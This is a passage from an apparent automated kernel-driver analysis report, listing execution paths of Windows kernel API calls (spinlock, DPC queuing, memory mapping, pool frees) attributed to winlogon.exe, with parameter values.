| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #142 (length: 35, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 35 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c750e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003afb5000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #143 (length: 31, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 31 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c751ef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a774fc0, Tag = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a774f20, Tag = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a788250, Tag = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #144 (length: 16, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 16 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c79eef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #145 (length: 74, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 74 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c84be38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c8ca000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
